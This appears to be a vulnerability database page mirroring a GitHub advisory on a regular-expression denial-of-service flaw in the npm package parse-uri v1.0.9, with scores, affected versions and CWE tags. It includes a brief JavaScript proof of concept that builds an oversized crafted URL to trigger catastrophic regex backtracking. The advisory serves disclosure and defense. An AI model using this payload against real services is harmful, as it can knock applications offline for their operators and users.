Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-6fx8-h7jm-663j

Опубликовано: 16 янв. 2025
Источник: github
Github: Прошло ревью
CVSS4: 6.9

Описание

parse-uri Regular expression Denial of Service (ReDoS)

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

PoC

async function exploit() { const parseuri = require("parse-uri"); // This input is designed to cause excessive backtracking in the regex const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value'; const result = await parseuri(craftedInput); } await exploit();

Пакеты

Наименование

parse-uri

npm
Затронутые версииВерсия исправления

<= 1.0.9

Отсутствует

Наименование

parseuri

npm
Затронутые версииВерсия исправления

Отсутствует

EPSS

Процентиль: 19%
0.00061
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-1333
CWE-185

Связанные уязвимости

CVSS3: 6.5
nvd
около 1 года назад

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

EPSS

Процентиль: 19%
0.00061
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-1333
CWE-185